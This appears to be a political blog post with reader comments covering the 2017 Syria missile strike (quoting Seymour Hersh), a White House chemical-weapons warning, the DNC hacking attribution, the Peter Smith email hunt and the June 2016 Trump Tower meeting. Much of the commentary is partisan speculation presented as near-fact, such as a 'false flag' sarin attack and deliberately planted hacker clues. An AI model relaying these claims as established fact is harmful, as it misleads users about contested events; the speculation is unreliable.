“Trump ruled out option one off the bat,” the senior adviser said, and the assassination of Assad was never considered. “But he said, in essence: ‘You’re the military and I want military action.’” The president was also initially opposed to the idea of giving the Russians advance warning before the strike, but reluctantly accepted it. “We gave him the Goldilocks option – not too hot, not too cold, but just right.” The discussion had its bizarre moments. Tillerson wondered at the Mar-a-Lago meeting why the president could not simply call in the B52 bombers and pulverize the air base. He was told that B52s were very vulnerable to surface-to-air missiles (SAMs) in the area and using such planes would require suppression fire that could kill some Russian defenders. “What is that?” Tillerson asked. Well, sir, he was told, that means we would have to destroy the upgraded SAM sites along the B52 flight path, and those are manned by Russians, and we possibly would be confronted with a much more difficult situation. “The lesson here was: Thank God for the military men at the meeting,” the adviser said. “They did the best they could when confronted with a decision that had already been made.”
Fifty-nine Tomahawk missiles were fired from two U.S. Navy destroyers on duty in the Mediterranean, the Ross and the Porter, at Shayrat Air Base near the government-controlled city of Homs. The strike was as successful as hoped, in terms of doing minimal damage. The missiles have a light payload – roughly 220 pounds of HBX, the military’s modern version of TNT. The airfield’s gasoline storage tanks, a primary target, were pulverized, the senior adviser said, triggering a huge fire and clouds of smoke that interfered with the guidance system of following missiles. As many as 24 missiles missed their targets and only a few of the Tomahawks actually penetrated into hangars, destroying nine Syrian aircraft, many fewer than claimed by the Trump administration. I was told that none of the nine was operational: such damaged aircraft are what the Air Force calls hangar queens. “They were sacrificial lambs,” the senior adviser said. Most of the important personnel and operational fighter planes had been flown to nearby bases hours before the raid began. The two runways and parking places for aircraft, which had also been targeted, were repaired and back in operation within eight hours or so. All in all, it was little more than an expensive fireworks display.
“It was a totally Trump show from beginning to end,” the senior adviser said. “A few of the president’s senior national security advisers viewed the mission as a minimized bad presidential decision, and one that they had an obligation to carry out. But I don’t think our national security people are going to allow themselves to be hustled into a bad decision again. If Trump had gone for option three, there might have been some immediate resignations.”
After the meeting, with the Tomahawks on their way, Trump spoke to the nation from Mar-a-Lago, and accused Assad of using nerve gas to choke out “the lives of helpless men, women and children. It was a slow and brutal death for so many … No child of God should ever suffer such horror.” The next few days were his most successful as president. America rallied around its commander in chief, as it always does in times of war. Trump, who had campaigned as someone who advocated making peace with Assad, was bombing Syria 11 weeks after taking office, and was hailed for doing so by Republicans, Democrats and the media alike. One prominent TV anchorman, Brian Williams of MSNBC, used the word “beautiful” to describe the images of the Tomahawks being launched at sea. Speaking on CNN, Fareed Zakaria said: “I think Donald Trump became president of the United States.” A review of the top 100 American newspapers showed that 39 of them published editorials supporting the bombing in its aftermath, including the New York Times, Washington Post and Wall Street Journal.
Five days later, the Trump administration gathered the national media for a background briefing on the Syrian operation that was conducted by a senior White House official who was not to be identified. The gist of the briefing was that Russia’s heated and persistent denial of any sarin use in the Khan Sheikhoun bombing was a lie because President Trump had said sarin had been used. That assertion, which was not challenged or disputed by any of the reporters present, became the basis for a series of further criticisms:
– The continued lying by the Trump administration about Syria’s use of sarin led to widespread belief in the American media and public that Russia had chosen to be involved in a corrupt disinformation and cover-up campaign on the part of Syria.
– Russia’s military forces had been co-located with Syria’s at the Shayrat airfield (as they are throughout Syria), raising the possibility that Russia had advance notice of Syria’s determination to use sarin at Khan Sheikhoun and did nothing to stop it.
– Syria’s use of sarin and Russia’s defense of that use strongly suggested that Syria withheld stocks of the nerve agent from the UN disarmament team that spent much of 2014 inspecting and removing all declared chemical warfare agents from 12 Syrian chemical weapons depots, pursuant to the agreement worked out by the Obama administration and Russia after Syria’s alleged, but still unproven, use of sarin the year before against a rebel redoubt in a suburb of Damascus.
The briefer, to his credit, was careful to use the words “think,” “suggest” and “believe” at least 10 times during the 30-minute event. But he also said that his briefing was based on data that had been declassified by “our colleagues in the intelligence community.” What the briefer did not say, and may not have known, was that much of the classified information in the community made the point that Syria had not used sarin in the April 4 bombing attack.
…
The crisis slid into the background by the end of April, as Russia, Syria and the United States remained focused on annihilating ISIS and the militias of al-Qaida. Some of those who had worked through the crisis, however, were left with lingering concerns. “The Salafists and jihadists got everything they wanted out of their hyped-up Syrian nerve gas ploy,” the senior adviser to the U.S. intelligence community told me, referring to the flare up of tensions between Syria, Russia and America. “The issue is, what if there’s another false flag sarin attack credited to hated Syria? Trump has upped the ante and painted himself into a corner with his decision to bomb. And do not think these guys are not planning the next faked attack. Trump will have no choice but to bomb again, and harder. He’s incapable of saying he made a mistake.”
———-
9. That’s ominous: So you know that potential bombshell report by Sy Hersh in Die Welt about how Donald Trump’s intelligence and military advisors has concluded that Bashar Assad’s regime was not in fact responsible for a sarin gas attack but instead the cloud of chemicals was a consequence of secondary explosions of stored chlorine and fertilizer in building by the Syrian air force? That report has been almost entirely ignored by American news outlets? Well, it’s going to be a lot harder to ignore that report now that the White House just issued an ominous message indicating it has evidence that Assad’s forces were planning a chemical attack and if that happens the consequences will be severe and Russian and Iran will be held responsible:
The White House issued an ominous warning to Syrian President Bashar al-Assad on Monday night, pledging that his regime would pay a “heavy price” if it carried out another chemical attack this year.
In a statement, White House press secretary Sean Spicer said that the United States had detected evidence of preparations for a chemical attack, similar to the preparations that occurred before an attack in April.
“The United States has identified potential preparations for another chemical weapons attack by the Assad regime that would likely result in the mass murder of civilians, including innocent children,” Spicer said in the statement. “The activities are similar to preparations the regime made before its April 4, 2017 chemical weapons attack.
“As we have previously stated, the United States is in Syria to eliminate the Islamic State of Iraq and Syria,” he continued. “If, however, Mr. Assad conducts another mass murder attack using chemical weapons, he and his military will pay a heavy price.”
Following the April attack, President Trump ordered an air strike against the Assad-controlled air field where the attack was believed to have been carried out.
At the time, Trump said that Assad’s use of chemical weapons against innocent women and children made action inevitable.
“When you kill innocent children, innocent babies, babies, little babies, with a chemical gas that is so lethal — people were shocked to hear what gas it was,” Trump said after the attack. “That crosses many, many lines, beyond a red line, many, many lines.”
Following Spicer’s statement on Monday night, Nikki Haley, the U.S. Ambassador to the United Nations said Assad and its allies would be squarely blamed if such an attack occurred.
“Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people,”Haley wrote.
Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people.— Nikki Haley (@nikkihaley) June 27, 2017
The U.S. military maintains a variety of weapons in the region that could be used in the event of another strike, including manned and unmanned aircraft in several Middle Eastern countries. But the most likely scenario is probably a strike using naval assets, which can be launched with fewer diplomatic issues than using bases in allied countries such as Turkey or the United Arab Emirates.
The Navy launched Tomahawk missiles at a Syrian military airfield April 6 in response to a previous alleged chemical weapons attack, using two guided-missile destroyers in the eastern Mediterranean Sea, the USS Ross and USS Porter, to do so.
…
A point of contention for the Pentagon after the last strike was the Syrian regime’s alleged use of a nerve agent, like sarin. It is far deadlier than some other chemicals that U.S. military and intelligence officials say that the regime has used, such as chlorine.
———-
“”The United States has identified potential preparations for another chemical weapons attack by the Assad regime that would likely result in the mass murder of civilians, including innocent children,” Spicer said in the statement. “The activities are similar to preparations the regime made before its April 4, 2017 chemical weapons attack.”
That was the message from Sean Spicer, followed by this warning to Iran and Russia from UN Ambassador Nikki Haley:
…
Following Spicer’s statement on Monday night, Nikki Haley, the U.S. Ambassador to the United Nations said Assad and its allies would be squarely blamed if such an attack occurred.“Any further attacks done to the people of Syria will be blamed on Assad, but also on Russia & Iran who support him killing his own people,” Haley wrote.
…
The Office of the Director of National Intelligence had a rather curious response to a Freedom of Information Act lawsuit demanding the release of the classified report given to President Obama back in January purporting to show the Russian government was behind the hacks. That the ODNI doesn’t want to release this document isn’t particularly curious. That’s to be expected. It’s the explanation from the ODNI for why they can’t release the document that’s curious. According to the ODNI, the requested document would present a risk to human intelligence sources by revealing the comparative weight given to human vs technical evidence, risking US sources and methods. But the ODNI went further, suggesting that even releasing a fully redacted document would present similar risks. So who knows what’s it that ODNI report, but it’s apparently so damn sensitive that the released of a fully redacted version of it presents a national security risk:
““Release of a redacted report would be of particular assistance to Russian intelligence, which, armed with both the declassified report and a redacted copy of the classified report, would be able to discern the volume of intelligence the U.S. currently possesses with respect to Russian attempts to influence the 2016 election,” Deputy Director of National Intelligence for Intelligence Integration Edward Gistaro wrote.”
Revealing the volume of the report alone is apparently problematic. So requested report is presumably either surprising long or surprisingly short. The length of the report is revealing of...something. And would reveal top secret intelligence and put lives at risk even if the report was fully redacted:
““I agree with the [National Intelligence Council] that a heavily or even fully redacted version of the classified report can not be publicly released without jeopardizing national security information properly classified as SECRET or TOP SECRET,” he wrote.”
What is it about this report’s volume that’s so dangerous revealing? We don’t get to know. But note the kind of information that EPIC was trying to get from its lawsuit and which was largely left out of the released unclassified version: Technical evidence:
So it’s probably worth noting that the big piece in the Washington Post describing the behind-the-scenes decision-making in the Obama administration over how to respond the hacks and the risk of more cyberattacks mentions the critical sources of intelligence that the US relied on in coming to its conclusion that the Russian government was behind the hacks. There was critical human intelligence that apparently came from a source deep inside the Kremlin, and critical technical evidence from a foreign ally. And there was something about that ally that made the NSA not trust that evidence initially. So the refusal to even release a fully redacted version of that report over fears of revealing sources and methods is pretty odd since there’s already been some significant details revealed in the media about those sources and methods. Details like a source deep inside the Kremlin:
“Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence.”
So based on the Washington Post report we’re told that some of the most critical technical evidence come from a rather iffy source. And based on the ODNI’s explanation for why it can’t release even a fully redacted version of that report it’s because doing so could reveal the relative weight the US applied to human vs technical evidence in coming to its assessment. It raises the possibility of the technical evidence playing a surprisingly small role, which is turn raises the question of just how much the final conclusion was based on the Kremlin source alone.
And given the possibility that human intelligence played an overwhelming role in the US reaching the conclusion it made, it’s increasingly important to keep in mind one of the more amazing revelations in how this investigation unfolded: the discovery that someone was passed the FBI Russian intelligence documents in March of 2016 claiming that the Russians had the hacked DNC emails. And that alleged Russian intelligence document turned out to contain disinformation. The source was unable to provide any of the emails the document claimed the Russians had and the FBI was unable to corroborate other intelligence provided by this same source. So it’s already been reported that someone, presumably someone with access to Russian intelligence, was feeding the US government disinformation about Russian involvement in the hack:
“After the bureau first received the document, it attempted to use the source to obtain the referenced email but could not do so, these people said. The source that provided the document, they said, had previously supplied other information that the FBI was also unable to corroborate.”
That doesn’t sound like a very good source. But they definitely good at making an impact despite raising a number of doubts:
Adding to the mystery, note the timing of the FBI receiving this document: early March of 2016:
Keep in mind that the FBI first casually notified the DNC of the detected hacking back in the fall of 2015 and the hacks weren’t publicly reported on until mid June of 2016. So this Russian intelligence document arrived in the FBI’s hands at a time when the US government, and presumably allied governments, knew about the ongoing hacking of the DNC, but the public at large didn’t know. So someone who can claim to have access to Russian intelligence documents passed along an intelligence document that implicated the Russian government in the hacks months before the public phase of the hacking fiasco ever got started. And that intelligence contained disinformation seemingly intended to sow fears in the US government of what the Russians would dump this alleged email to the public, damaging public perception of the investigations into HIllary’s private emailby showing collusion between the Attorney General and Hillary. And these fears apparently catalyzed James Comey’s decision to give that press conference on June 8th. A press conference that took place a week before the initial news reports that the DNC was hacked and a month and a half before the initial release by Wikileaks of the hacked emails in late July. It’s all pretty puzzling.
So is the “deep in the Kremlin” source who claimed Putin ordered the hacking the same source of this bogus Russian intelligence document? Did the document even come from someone in the Russian government or did it come from a rival intelligence service? And if it did come from a rival intelligence service, is this the same foreign ally who provided the critical technical evidence that the NSA didn’t place much faith in or was that a different foreign ally?
There’s no shortage of questions raised by all this. Too bad the ODNI won’t release that classified report. Apparently it would have provided a lot of answers. Fully redacted or not.
Another day, another massive revelation in the #TrumpRussia story: The Wall Street Journal just put out a pair of stories about what appears to be an operation involving senior figures in the Trump campaign (Steve Bannon, Kellyanne Conway, Sam Clovis, and Michael Flynn) to seek out and obtain what they hoped were hacked emails from Hillary Clinton’s email server that they apparently believed were being provided by Russian hackers probably associated with the Russian government. This all apparently was arranged shortly after Trump made his infamous call for Russian to hack Hillary’s emails and the person leading the operation is the one who went to the Wall Street Journal to tell everyone about it. Yep.
So who is this gadfly who led what was purportedly one of the most sensitive political dirty tricks operations in decades and just could help blabbing about it to a the Wall Street Journal (a Murdoch family owned publication): Peter Smith, an 81 year old long-time conservative activist better known for his work in the 90’s financing anti-Clinton conspiracy theories and scandals like “Troopergate”. For some reason he decided to tell all this to the Wall Street Journal back in May, and then he died a week and half later. Smith talks about how he was in contact with 5 different hackers claiming to have Hillary Clinton’s hacked emails, two of which he believed were Russian hackers that he assumed were working for the Russian government, and how Smith’s team was unable to ever verify if any of the emails provided by these hackers were real. And Smith decided to tell the world about it for some really mysterious reason.
But Smith isn’t the only source in this story. Matt Tait, a former GCHQ cyber analysts who writes under the pseudonym PwnAllTheThings (and not the British ‘Alt-Right figure of the same name) claims to have been contacted by Smith to provide his expertise on whether or not the allegedly hacked emails were real. Tait claims he was contacted around the time Trump made his call for Russia to hack Hillary and say he initially thought Smith wanted him to provide his analysis on the DNC email hack that Tait had already written about. It was only later, after some phone interviews with Smith and some others, that Smith disclosed that he was putting together a group to try to track down and validate Hillary’s emails that Smith believed were likely available via hackers on the Darkweb. Tait says he grew uncomfortable with the operation in mid September, refused to sign a non-disclosure agreement, and parted ways with Smith’s operation.
It’s also important to note that Tait was a figure who was initially quite skeptical of Crowdstrike’s analysis that the DNC hacks were an act of the Russian government, but later came around to that conclusion. Why? Because of things like the meta-data in the leaked documents like the “Iron Felix” name. And Tait also felt that Guccifer’s behavior wasn’t self-aggrandizing enough to be consistent with a loan hacker. Also the command and control server used by the hackers coincided with the command and control server used in the 2015 Bundestag hacks(don’t forget the IP addresses were inexplicably hard coded into the malware). Based on this shoddy “Hi! I’m a Russian hacker!” evidence, Tait concluded in a July 28th blog post that the DNC hacks had indeed been the work on Russian government agents and he made this argument in a blog post a day after made his call for the Russians to hack Hillary on July 27th. So when Smith’s group approached Tait, Tait had already made it publicly clear that he was ready and willing to go along with the developing narrative of Russian government hackers that was predicated on the assumption that these were really horrible Russian government hackers.
Tait responded to the WSJ article with a long post on his blog were he lays out the personal experiences explaining why he went along with the operations for as long as he did, why he left it, and why he was pretty sure Smith wasn’t just engaging in name-dropping and puffery when he claimed to be working with a larger team that included figures like Bannon and Conway, recounting the number of details Smith would provide to Tait about the inner workings of the Trump campaign.
Also, critically, Tait notes that he never saw any of the emails allegedly provided to Smith by the hackers they contacted on the dark web.
But the revelations were limited to the pair of WSJ reports or Tait’s own account. It also mentions how US investigators are looking into intelligence reports about apparent Russian hackers were observer discussing how they count hack Hillary’s emails and then get them to Michael Flynn through and intermediary.
So at that point it looks like a long-time GOP anti-Clinton dirty tricks operative decided to promote a particular narrative about the Trump team’s role in the hackings that implicate Michael Flynn, Steven Bannon, and Kellyanne Conway in an operation that involved getting hacked emails by but simultaneously promote the notion that it was Russian government hackers (and not, you know, people hired by the Trump team leaving tons of “Hi! I’m a Russian hacker!” fingerprints). He decided to do this almost two months ago, and it’s just coming out now. It’s kind of hard to take it all at face value but it’s a pretty good attempt at a limited hangout intended to push Trump aside and make way for a non-openly crazy GOPer to replace him:
“The GOP operative in question is Peter W. Smith, who told the Journal during an interview last month that he began shopping around for the some 33,000 deleted Clinton emails in early September 2016, two months before Election Day. Smith’s efforts came in the wake of the WikiLeaks release of hacked Democratic National Committee emails that July and a month before the organization’s release of emails hacked from Clinton campaign chairman John Podesta in October. “Mr. Smith, a private-equity executive from Chicago active in Republican politics, said he assembled a group of technology experts, lawyers and a Russian-speaking investigator based in Europe to acquire emails the group theorized might have been stolen from the private server Mrs. Clinton used as secretary of state,” according to the WSJ.”
A whole team was assembled to obtain hacked emails from what they say they assumed were Russian hackers right at the height of a campaign that had Russian government hacking at the center of it. With Team people helping to coordinate it. That’s the story. The story taken to a major newspaper and sat on for two months:
And in this story we learn that about how investigators are working with intelligence agencies describing “Russian hackers” discussing how to hack Hillary’s emails and get them to Flynn taking place during the same period that Smith’s group was operating:
So that was the first WSJ report. It didn’t mention Smith’s connection to anyone on the Trump campaign other than Michael Flynn. It was the second WSJ report that drew in the rest of those senior Trump officials. And former GCHQ analyst Matt Tait, who appears to be the source for much of this information:
“Officials identified in the document include Steve Bannon, now chief strategist for President Donald Trump; Kellyanne Conway, former campaign manager and now White House counselor; Sam Clovis, a policy adviser to the Trump campaign and now a senior adviser at the Agriculture Department; and retired Lt. Gen. Mike Flynn, who was a campaign adviser and briefly was national security adviser in the Trump administration.”
Yep, senior Trump officials were identified in a document describing a corporation set up to obtain these emails. And according to Tait’s own blog posting, this corporation was set up in Delaware to avoid campaign disclosure laws (it’s a reminder that this story is another reason to revisit campaign finance laws):
So as Josh Marshall reasonably concludes, it looks like Tait is the source for much of the information in this second WSJ article. Tait’s own blog posting that popped up shortly after the article certainly supports that theory:
And in that blog post we find Tait describing an experience where Smith was openly sharing with him all sorts of rather amazing campaign gossip, like campaign infighting, doubts about Trump from his own staff, and Michael Flynn’s own ambitions to become head of the CIA or National Security Advisor. And this is all happening :
while Tait describes himself as basically an outsider, and not a particularly anti-Hillary outsider, who was invited into this cabal of GOP operatives and Trump team officials:
“By the middle of September, all contact between us ended. By this time, I had grown extremely uncomfortable with the situation, so when Smith and his colleague asked me to sign a non-disclosure agreement, I declined to do so. My suspicion was that the real purpose of the non-disclosure agreement was to retrospectively apply confidentiality to the conversations we had already had before that point. I refused to sign the non-disclosure and we went our separate ways.”
So after Tait, someone with no obvious outside connections to the Trump campaign, gets invited into this amazingly scandalous operation, and Peter Smith shares all these details about the Trump campaign’s inner workings with Tait but also shares with Tait how the Trump team claims to think it was dealing with Russian government hackers, only later does Smith try to get a non-disclosure agreement from Tait. It’s the latest indication that, if this whole narrative is real, this entire ‘op’ has got to be one of the worst in history from an operational security standpoint. The hacks by the ‘Russian hackers’ were a bad joke, and now we’re told the Trump team senior officials were involved in a corporation set up to obtained this hacked material from people they assumed were Russian government hackers. And they shared all this with an apparently outside who was former GCHQ. Before asking him to sign a non-disclosure agreement.
While it’s kind of joke operation if they were truly trying to get these allegedly hacked HIllary emails into the public domain without the Trump team getting charged with colluding with the Russian government, if it was an operation set up to potentially get discovered later for the purpose of reinforcing the narrative that it was definitely Russian government hackers behind the DNC/Podesta hacks, and definitely not someone involved with the Trump team, then it kind of makes sense. Potentially discovered later. Like, if Trump lost and there were all sorts of investigation into Trump team activities or if Trump won and turned out to be an unhinged lunatic. A pre-planted limited hangout. Is that possible? Well, again, note one of the reasons Smith would have potentially found Tait a useful person to bring on board with this operation if establishing that narrative: Tait was more than happy to back up Crowdstrike’s shoddy analysis:
Tait came around to Crowdstrike’s “Russian government hackers did view” based on some pretty questionable analysis.
Beyond that, it’s hard to ignore the fact that two of the senior Trump officials, Kellyanne Conway and Steve Bannon, joined the Trump team from the Robert Mercer/Cambridge Analytica crew. It was a package deal. And as we’ve learned now about Cambridge Analytica, it’s got deep ties to conservative elements of the British intelligence community.
So, first off, you have to wonder if Tait was recommended to the Trump team through someone tied to Cambridge Analytica. But beyond that, given that this story has become public at all, you have to wonder if this isn’t part of the Mercer crew basically pulling the lever and dumping Trump. It’s not like Trump hasn’t been a disaster when it comes to selling the American public on the Mercer/Koch pro-oligarch policy agenda. And there’s no sign he going to get less unhinged the more time he spends in office. Could we being seeing the first major limited hangout intended to take down Trump while maintaining the “Russian government hacker” narrative? Sure, there’s also the revelation of intelligence reports of Russian hackers discussing how to get into Hillary’s server and get the info to Flynn, but until we get more information on the nature of that intelligence it’s hard to put too much weight on it.
So, since Peter Smith is behaving like a GOPer trying to get Trump removed to make way for President Pence (or Ryan), it’s worth noting that one of the best forms of revenge for Trump would be to take the rest of the GOP down with him. After all, isn’t that what’s Trump’s base voted for? Burning down the oligarch-wing of the party to implement an agenda for the little guy? And what better was for Trump to burn down the party than to admit to knowing his team was arranging for the hacks and that the rest of the senior GOP leadership was in on it or at least knew about it and worked to cover it up (until they decided to dump Trump). That’s assuming such evidence exists, but if it does, and Trump reveals it, he’ll probably be one of the most popular politicians in GOP history. Hopefully someone makes it clear to Trump that this is an option. And makes it clear to him soon. At this point, what does he have to lose?
Sure, there’s probably plenty of blackmail material on him, but if Trump brings down the GOP big wigs, no one is going to care about all that blackmail material. Trump might be a far-right fascists nut job, but he’s just one. There’s a whole global network. And now, thanks to things like the 2016 hack attacks, Trump is in a position to do incredible damage to that global fascist network that appears to be turning on him and hanging him out to dry. Is he going to just take that? Isn’t he supposed to be a counter-puncher? Well, it looks like he’s getting punched big time. By his own team. Ouch.
The #TrumpRussian story got a jolt of adrenaline over the weekend following a series of stories discussing a meeting that took place on June 9th, 2016, attended by Donald Trump Jr., Paul Manafort, and Jared Kushner after they were invited to meet with an Kremlin-linked attorney. What did they talk about? Well, according to the initial report, it was just a meeting about policies impacting child adoptions and the a lobbying effort to reverse the Magnitsky Act. And the fact that this meeting took place is openly acknowledged by Trump Jr. and Kushner:
“Representatives of Donald Trump Jr. and Mr. Kushner confirmed the meeting after The Times approached them with information about it. In a statement, Donald Jr. described the meeting as primarily about an adoption program. The statement did not address whether the presidential campaign was discussed.”
As we can see, the ‘fake news’ charge isn’t going to work for this story. Jared Kushner and Trump Jr. both confirmed it. And the whole meeting was first disclose after Kushner amended his security clearance disclosure forms:
But that doesn’t mean there wasn’t anything ‘fake’ in this report. Because as we learned the next day, the Trump team’s depiction of the purpose of this meeting as being focused on adoption policies was pretty fake. Or at least included a a giant omission: It turns out Trump Jr. was invited to the meeting after being told that he was going to be given damaging information on Hillary Clinton. No such information was ever given, we are told.
But still, we now have reports that Trump Jr., Kushner, and Manafort attended a June 9th meeting with a Kremlin-linked lawyer and they showed up at this meeting expecting to receive damaging information on Hillary Clinton. And once again, the report is backed up by Donald Trump, Jr.‘s own statements. He’s taking an ‘of course I would attend such a meeting! who wouldn’t?!’ approach to it all and spinning the offer of damaging info on Hillary as just a ruse intended to get the Trump team’s ear so they could be lobbied about child adoption policies. And, yes, that’s an incredibly absurd and cynical way to spin it, but that’s actually the Trump, Jr’s spin: we tried to get the damaging Hillary info from the Russians but it was all a ruse. So no harm, no foul. And anyone else would have done the same!:
““No details or supporting information was provided or even offered. It quickly became clear that she had no meaningful information,” he said, saying he concluded that claims of helpful information for the campaign had been a “pretext” for setting up the meeting”
Poor Don Jr. He thought he was going to get some ‘helpful information’ but it just turned out to be lure to set him up for a lobbying pitch. Uh huh.
So Donald Trump Jr. is now openly admitting this meeting happened. But here’s what adds to the mystery: It’s not just Trump Jr’s admissions to the press that’s bringing us this story. There are five senior White House advisors who are anonymously acting as sources for this:
“What I suspect is the most important detail in this story is the sources. The Times reports that they got the information from “three advisers to the White House briefed on the meeting and two others with knowledge of it.” They apparently talked after the release of the first story. This is highly, highly significant. Needless to say, advisors to the White House are not in the business of taking highly damaging stories and volunteering new information which makes them catastrophically damaging. The only reason a President’s allies ever do something like that is either to get ahead of something much more damaging or get a first crack at shaping the public understanding of something much more damaging. There’s really no other explanation. We don’t know yet what drove them to volunteer such highly damaging information. Five of them did it. It wasn’t a matter of one person going rogue.”
Yep, we didn’t just see a pair of a blockbuster reports come out over the weekend. We saw was appears to be a coordinate high-level White House public relations campaign. Some sort of limited hangout that appears to be intended to get ahead of something. What could that something be? Well, whatever it is it’s something worse than the story that Trump Jr. is now admitting to. And as Josh Marshall speculates, what we’re seeing might have less to do with the White House preemptively working to shape the narrative and instead have more to do with the rest of these White House advisors — who are, themselves, at risk of getting dragged into the legal morass that Trump Jr. is now clearly in — preemptively throwing Trump Jr. under the bus in the hopes of cushioning their own legal blows:
“These are all purely hypotheticals. It remains key that five people that the Times chose to call advisors to the White House talked to the Times. That’s a lot of people. But today I get the sense that the story is one I should have considered more fully yesterday: one of the biggest threats to the Trump White House is the kind of dingbat, spy v spy infighting and blood feuds we’ve observed already but likely only know the half of. In a normal White House this might just lead to lots of bad press and lack of esprit de corps. Reagan’s White House was a bit notorious for this. But when numerous advisors, in and outside the White House, are looking at profound legal jeopardy, the stakes get a lot higher”
Don’t forget: there could be any number of people looking at potential treason charges if the worst-case scenario really does pan out and the Trump team was knowingly taking anti-Hillary info from the Russian government. And once Jared Kushner revised his disclosure forms and revealed this meeting took place, the public discovery of this meeting was sort of a ticking time-bomb for the Trump team. It wasn’t of a matter of if it got revealed but when. And, sure enough, we have this one-two punch of major stories coming from give White House advisors that’s making Donald Trump Jr., Jared Kushner, and Paul Manafort at the top of the list of Trump team members who knowingly colluded with the Russian government. If these stories were an attempt to shape the narrative, it appears to be intended to shape it in a manner that limits the collusion blame to those three individuals.
So when we’re asking cui bono about the this story, the biggest beneficiary is obviously Donald Trump himself. But with five advisors acting as sources for this story it’s a reminder that it could be a lot more than just Trump who’s trying to cover their ass at this point.
And there’s another interesting angle to all this: Remember the mystery of the Alfa bank server and its unexplained communications with a Trump-associated server? Well, it turns out that the first big spike in traffic between the servers started in mid-June, shortly after the June 9th meeting (see the screenshot of the traffic and how it spikes for the first time in Mid-June from the 10/31/2016 Slate article). So who knows if the Alfa bank server mystery is about to get reignited too.
All we know at this point is that Donald Trump Jr., Jared Kushner, and Paul Manafort appear to have been thrown under the bus by a group of White House insiders. And Don Jr. is helping to throw himself under the bus with tweets like this:
So Don Jr. is looking rather disposable at this point. Which makes sense since he’s not officially part of the Trump administration at this point and can presumably be trusted to deflect as much as he can away from his dad. Same with Jared. Sort of. Filling his shoes in the administration will be an interesting task if he leaves. But it’s looking like Trump’s son and son-in-law could be the next victims of #TrumpRussiaGate.
And in other news, Steve Bannon, a top advisor who wasn’t yet part of Trump’s team during the June 9th meeting, is now reportedly back in Trump’s good graces. Interesting timing...
Well, it’s looking like the #TrumpRussia investigation could be transition from “Did the Russian government attempt to help to the Trump campaign?” to “How exactly did the the Russian government attempt to help the Trump campaign?”: According to three people with knowledge of an email sent by Rob Goldstone — the talent agent who arranged the now notorious June 9th, 2016 — specifically stated that the damaging information on Hillary Clinton that was to be provided at the meeting was coming from the Russian government and part of an attempt by the government to help Trump’s campaign. That was apparently in the opening email Goldstone sent to Trump Jr. And Trump Jr. decided to go to the meeting anyway. Along with Kushner and Manafort:
“Mr. Goldstone’s message, as described to The New York Times by the three people, indicates that the Russian government was the source of the potentially damaging information. It does not elaborate on the wider effort by Moscow to help the Trump campaign.”
So if that’s an accurate recounting of that email it would appear, at a minimum, that the Trump campaign was more than happy to knowingly collude with the Russian government. Which isn’t particularly surprising. What is surprising is that we now have three people, presumably people involved with the Trump campaign, who are telling reporters about it.
And perhaps even more surprising is the idea that someone who would appear to be working on behalf of a Russian intelligence operation would send an email to a Trump campaign official that basically says ‘this information is from the Russian government because it wants to help you guys’. Is that really the kind of information you should put in an email? Well, when you zoom out and look at the incredible list of inexplicably reckless or amateurish mistakes made across this entire affair — the inexplicably revealing hacking mistakes, the inexplicably bad cover for “Guccifer” as a ‘Romanian hacker’ who can’t even speak Romanian, the various clues left in the leaked document meta data — yes, sending an email saying “I’m working for the Russian governmen!” is in keeping with the general level of spycraft on display throughout this entire operation.
At the same time, notice how there’s no hint from any of these sources that this meeting in any way involved with hacked DNC material:
So it’s still very possible that this meeting didn’t involve DNC hacks, although timing was certainly suspicious.
But one of the questions raised by the timing specifically ties into one of the biggest mysterious of the DNC/Podesta hacks: the question of why was the release of the hacked material done in a manner that so strongly pointed the finger back towards Russia? Because even if you assume that the DNC hacks were indeed carried out by the Russian government, once you factor in that the Trump team was apparently having open meetings with Russian government operatives before the hacked emails were released to the public there’s a big question about who released those emails. Did the Trump team receive the emails and then release them under the guise of ‘Guccifer 2.0’, or was that really a Russian agent? And did the Trump team add all those ‘I’m a Russian!’ meta-data fingerprints to the documents or was that the work of the Russian hackers? And if it was the Russian government that added all these ‘I’m a Russian’ clues to the release of the hack, did they do that as part of the quid pro quo with the Trump team? Sort of a “we’ll take the blame, in exchange for [insert quo here]” arrangement?
In other words, while there’s generally been a dismissal of all the various ‘mistakes’ that were made by the alleged ‘Russian hackers’ that raise all sorts of questions about the nature of the hack, it’s important to remember that all these in-your-face ‘mistakes’, if intentionally done and if done by actual Russian hackers, point towards an even higher ‘price’ that the Trump team would have had to pay for such a service. Because as the media coverage of the 2016 hackings has amply demonstrated, there’s been almost no suspicions that the Trump team was directly involved in carrying out those hacks. It was concluded early on that it was the Russians and all those inexplicable ‘mistakes’ were key pieces of ‘evidence’ that it was indeed Russian hackers. If those ‘mistakes’ were intentional and this really was done by Russian government hackers, those ‘mistakes’ were pretty valuable to the Trump campaign. At least in the short run, during the campaign since the obvious other suspect for the hacks would have been the Trump campaign itself. So all those hacker ‘mistakes’ bought Trump some plausible deniability, albeit at the cost of charges of Russian collusion. Was that a ‘service’ being offered?
Of course, now that Trump is president, all those hacker ‘mistakes’ pointing towards Russian hackers has swamped his administration in a sea of investigations that could end up consuming his administration and personal empire. So if the Russian government really did do these hacks, and really did leave all these Russian ‘fingerprints’ intentionally as a kind of service to Trump, it’s hard to say that it was a service worth requesting. And given the long-term damage this whole affair could do to US-Russian relations it would be baffling if the Russian government ever considered taking the blame for such an operation even with the payout of a friendly Trump administration being dangling in front of them. The cost-benefit ratio is just horrible, especially if Russia intentionally took the blame which would inevitably hamper the ability of a friendly Trump administration from doing things like easing sanctions.
Or did the Trump team receive a bunch of hacked emails and then themselves decide to distribute them in a manner that made it look like Russian hackers did it? That would also explain those hacker ‘mistakes’.
At this point, simply trying to figuring out what kind of basic rationale was being employed by all of the various actors involved with the situation is become increasingly difficult as a story of increasingly unreasonable people and actions unfolds. What we know for sure is that three people with a close connection to this story are making sure this is a really, really big story right now. Is this all a setup for a big disappointment or the begin of the end of the Trump administration? We’ll see.
@Pterrafractyl–
Note the role of CIA operative, and FBI informant, and convicted organized figure Felix Sater in brand Trumpo’s business ventures in Russia that ultimately led to the association with this group. Note, also, that Sater’s name was largely eclipsed in the discussion of Trump’s meeting with a Ukrainian lawyer to discuss lifting sanctions against Russia.
https://www.forbes.com/sites/chasewithorn/2017/03/20/inside-trumps-russia-connections-the-felon-and-the-pop-star/#3d8afe343a47
Best,
Dave
